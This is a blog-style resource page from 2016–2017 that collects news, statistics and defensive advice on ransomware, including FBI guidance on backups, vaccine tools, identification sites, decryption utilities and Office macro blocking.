5/4/16: PhishMe April Cybercrime Alert: Ransomware Attacks Expected to Increase

Webroot’s Guide to Avoid Being a Crypto-Ransomware Victim, subtitled Over 15 Practical Things You Can Do To Protect Your Organization and Data. Looks pretty useful.

[12th April 2016] Extract from blog article here: UK threat prevalence – Symantec

John Leyden for The Register has summarized Symantec’s latest Internet Security Threat Report, and focuses on UK-specific figures for threat prevalence: Spear phishers target gullible Brits more than anyone else – survey; Ransomware, 0days, malware, scams… all are up, says Symantec.

Of particular relevance to this site are the statistics for crypto ransomware attacks (up by 35% in the UK) and for tech support scams (7m attacks in 2015). Since this is described as a survey, I guess the figures are extrapolated from the surveyed population’s responses rather than from a more neutral source, but I can’t say for sure.

[9th May 2016]

Help Net Security posted a useful update referring to commentary from Kaspersky – New ransomware modifications increase 14%. Points made in the article include these:

  • The (sub)title refers to 2,896 modifications made to ransomware in the first quarter of 2016, an increase of 14%, and a 30% increase in attempted ransomware attacks.
  • According to Kaspersky, the ‘top three’ offenders are ‘Teslacrypt (58.4%), CTB Locker (23.5%), and Cryptowall (3.4%).’ Locky and Petya also get a namecheck.
  • Kaspersky also reports that mobile ransomware has increased ‘from 1,984 in Q4, 2015 to 2,895 in Q1,2016.’

Graham Cluley, for ESET, quotes the FBI: No, you shouldn’t pay ransomware extortionists. Encouragingly, the agency seems to have modified its previous stance in its more recent advisory. The agency also offers a series of tips on reducing the risk of succumbing to a ransomware attack. Basic advice, but it will benefit individuals as well as corporate users, and reduce the risk from other kinds of attack too. I was mildly amused, though, to read in the FBI tips:

– Secure your backups. Make sure they aren’t connected to the computers and networks they are backing up.

It’s a bit tricky to back up data without connecting to the system used for primary storage. I think what the FBI probably meant was that you shouldn’t have your secure backups routinely or permanently accessible from that system, since that entails the strong risk that the backups will also be encrypted.

The tips include a link to an FBI brochure that unequivocally discourages victims from paying the ransom, as well as expanding on its advice. And it is clearer on the risk to backups:

Examples might be securing backups in the cloud or physically storing offline. Some instances of ransomware have the capability to lock cloud-based backups when systems continuously back up in real time, also known as persistent synchronization. Backups are critical in ransomware; if you are infected, this may be the best way to recover your critical data.

Recovering from (and preventing) ransomware

If this is your principal reason for visiting this page, you might want to start with the AVIEN Ransomware Recovery and Prevention resource page rather than here.

[Added 10th September 2017]

Andra Zaharia, security evangelist at Heimdal, has published a very useful and exhaustive checklist for reducing your exposure to ransomware: The Anti-Ransomware Protection Plan You Need to Follow Today.

I get tired of reading ‘how to defend against ransomware’ articles that miss out vital points like not staying permanently connected to in-the-cloud storage, but this one really does cover most of the angles. Very nice.

ESET – Best practices to protect against Filecoder (ransomware) malware (other brands and advice are available)

[21 April 2016]

Graham Cluley reports for Hot for Security that Only 38% of businesses believe they will recover from a ransomware attack. He cites a study by Tripwire – Survey: 62% of Companies Lack Confidence in Ability to Confront Ransomware Threat – based on the responses of security professionals at RSA 2016.

Interestingly, Tripwire also ran a Twitter poll asking ‘What is the most important step users can take to prevent ransomware infections?’

The options and responses were:

  • 47% said ‘Don’t click suspect links’
  • 37% said ‘Back up your data often’
  • 11% said ‘Install software patches’
  • 5% said ‘Use an AV solution’

I won’t complain about the low ranking of AV here: after all, no-one is suggesting, presumably, that all those options are mutually exclusive, and in fact they’re all steps people should be taking. But I can’t help wondering who these people are who click on a link even though it’s suspicious. Isn’t the point that so many people have such an unformed view of what ‘suspicious’ really means?

[6th April 2016]

Bitdefender recently offered ‘a new vaccine tool which can protect against known and possible future versions of the CTB-Locker, Locky and TeslaCrypt crypto ransomware families by exploiting flaws in their spreading methods.’ Combination Crypto-Ransomware Vaccine Released. Bitdefender also offers a Cryptowall vaccine.

Graham Cluley discusses the new vaccine as well as the generic Cryptostalker tool. He rightly points out that ‘Prevention is better than cure… especially when cures may be impossible’ in his article Vaccine for future versions of Locky, Teslacrypt, and CTB-Locker ransomware released. Bitdefender’s Bogdan Botezatu makes it clear in an article by Lucian Constantin that the vaccine is meant to complement other security measures, not replace them.

‘Vaccine’ programs have been around pretty much as long as malware, though the type of program to which the label is attached may vary widely. However, the term is often applied to programs that take advantage of malware that inserts a recognition marker into a compromised program or system, for example as a registry entry, so that it knows that the system has been compromised. Vaccination inserts the same marker to fool the malware into thinking that compromise has taken place.

Such techniques have their place, but their useful lifespan is likely to be limited as malware authors realize that they are being used, and change their markers or their approach to recognition marking accordingly.

The problem for the end user is that that their system may be threatened after the recognition marker has been changed and before the vaccination tool has been updated. If, indeed, it is updated. Mainstream security companies do try to maintain such free tools consistently (but not necessarily promptly enough to avoid the problem). However, there have been instances of freeware from other sources that may have been effective initially, but when support and maintenance ceased, they became a danger to their users simply because those users were made vulnerable by a false sense of security.

All credit to Bitdefender for adding to the protective options available for end users. I’m just worried that some users of similar tools will place all their faith in them without taking all the other precautions that can help to keep them safe(r) from ransomware.

[13-4-16] There is no simple or universal answer to a ransomware attack (apart from taking all possible precautions in advance, and there are no guarantees even then). However, the site ID Ransomware does seem to offer a way for victims to (maybe) identify the ransomware that has attacked their system. (I haven’t tested it myself.)

As I understand it, the site works like this:

  • It allows a victim to upload a file displaying ransom/payment information or one of the encrypted files, and attempts to use the uploaded file to identify the malware that implemented the attack. It currently claims to detect 52 varieties of ransomware.
  • If there is a known way of decrypting the encrypted files without paying the ransom, it directs the victim towards it.

The site doesn’t offer to decrypt files directly itself, and doesn’t want samples of the actual malware.

Standalone Decryption Utilities

I haven’t personally tested these, and they may not work against current versions of the ransomware they’re intended to work against. Note also that removing the ransomware doesn’t necessarily mean that your files will be recovered. Other companies and sites will certainly have similar resources: I’m not in a position to list them all.

Bleeping Computer Malware Removal Guides

ESET standalone tools

Included with tools for dealing with other malware.

Also: How do I clean a TeslaCrypt infection using the ESET TeslaCrypt …

Kaspersky Tools

CoinVault decryption tool
CryptXXX decryption tool

Trend Micro Tools

Emsisoft Decryptors

18-4-2016 [HT to Randy Knobloch] N.B. I haven’t tested these personally, and recommend that you read the ‘More technical information’ and ‘Detailed usage guide’ before using one of these.

AVG decryptors

‘…for the decryption of six current ransomware strains: Apocalypse, BadBlock, Crypt888, Legion, SZFLocker, and TeslaCrypt.’

Macro malware countered by Group Policy

Macro malware has been back with us for some time, now, and ransomware such as Locky has been taking advantage of that vector.

Microsoft has taken a significant step towards addressing the issue in the enterprise by restricting access to macros via Group Policy. Its blog article New feature in Office 2016 can block macros and help prevent infection doesn’t talk about ransomware directly, but of course it will help against other types of macro-exploiting malware too.

John Leyden’s article for The Register – Microsoft beefs up defences against Office macros menace – also refers, as does this Sophos commentary.

Experiences and thoughts on preparation [19-April-2016]

An article by Emily Sweeney for the Boston Globe 5 things to know about ransomware is essentially a personal recollection of being a victim coupled with some basic advice, but it’s not bad advice. Except that the point I’d always stress about backups is the need to ensure that they’re not so easily accessible that reasonably advanced ransomware will be able to encrypt the backed-up material at the same time. And don’t access your offline backups until you’re sure the malware has been eradicated.

Meanwhile, a Spiceworks post describes a couple of very bad days for a sysadmin of which a Cryptowall attack was just a part. A salutary reminder that disasters aren’t always considerate enough to happen one at a time, and that it’s always worth over-engineering a corporate backup strategy.

Sean Gallagher (or at any rate an editor looking for an eye-catching headline) for Ars Technica tells us OK, panic—newly evolved ransomware is bad news for everyone – Crypto-ransomware has turned every network intrusion into a potential payday. I don’t think panic is the best response to the ransomware problem, but there’s certainly an argument for informed concern, and the article does describe some aspects that we should indeed be concerned about and take steps to address.

According to Jessica Davis, TrapX offers a tool called CryptoTrap which is claimed to use ‘deception technology to trick potential hackers and lure them away from valuable assets.’ It’s claimed to have been found effective in defending network drives against TeslaCrypt, Locky and 7ev3n.

Ransomware, Bitcoin, other payment options

What devices and platforms are affected?

Specific Ransomware Families and Types